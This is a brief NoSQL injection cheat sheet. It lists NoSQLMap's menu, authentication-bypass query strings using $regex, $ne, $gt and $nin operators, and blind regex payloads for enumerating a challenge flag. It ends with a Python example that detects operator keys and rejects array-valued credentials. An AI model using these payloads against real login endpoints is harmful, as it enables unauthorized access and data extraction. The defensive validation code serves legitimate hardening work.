NoSQL Injections
NoSQLMap
https://github.com/codingo/NoSQLMap
1-Set options ( do this first)
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
x-Exit
Basic Authentication
index.php?login[$regex]=a.*&pass[$ne]=lol
index.php?login[$gt]=admin&login[$lt]=test&pass[$ne]=1
# Basic NoSQL Injection
http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
Blind NoSQL Injection
# Get size
index.php?chall_name=nosqlblind&flag[$regex]=.1
# Enumeration
index.php?chall_name=nosqlblind&flag[$regex]=3a.20
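
Server-side check for the bracket-operator parameters above (added example, not from the original page or from NoSQLMap). It is a simplified Python model of how PHP expands name[$op]=value into a nested array, plus validation that flags operator keys and rejects non-string credentials. The function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

def php_style_params(query):
    """Simplified model of PHP expanding name[key]=value into nested arrays."""
    out = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        tokens = re.findall(r"\[\]|[^\[\]]+", name)
        if not tokens:
            continue
        node, key = out, tokens[0]
        for sub in tokens[1:]:
            if not isinstance(node.get(key), dict):
                node[key] = {}
            node = node[key]
            key = len(node) if sub == "[]" else sub  # "[]" appends, as in PHP
        node[key] = value
    return out

def operator_paths(value, path=""):
    """List every client-supplied key path whose key starts with '$'."""
    hits = []
    if isinstance(value, dict):
        for k, v in value.items():
            here = f"{path}[{k}]" if path else str(k)
            if isinstance(k, str) and k.startswith("$"):
                hits.append(here)
            hits += operator_paths(v, here)
    return hits

def login_filter(params):
    """Hardened lookup: credentials must be plain strings, never arrays."""
    login, password = params.get("login"), params.get("pass")
    if not isinstance(login, str) or not isinstance(password, str):
        raise ValueError("login and pass must be scalar strings")
    # Assumption: the password is verified against a stored hash after the
    # lookup, so only the login goes into the filter; $eq pins equality.
    return {"login": {"$eq": login}}

# Constructed sample requests: one benign, one carrying operator keys.
BENIGN = "login=admin&pass=s3cret"
TAMPERED = "login[$regex]=a.*&pass[$ne]=lol"

if __name__ == "__main__":
    print(login_filter(php_style_params(BENIGN)))
    tampered = php_style_params(TAMPERED)
    print(tampered, operator_paths(tampered))
    try:
        login_filter(tampered)
    except ValueError as exc:
        print("rejected:", exc)
```

operator_paths() can also be run over logged query strings to surface requests that carried operator keys.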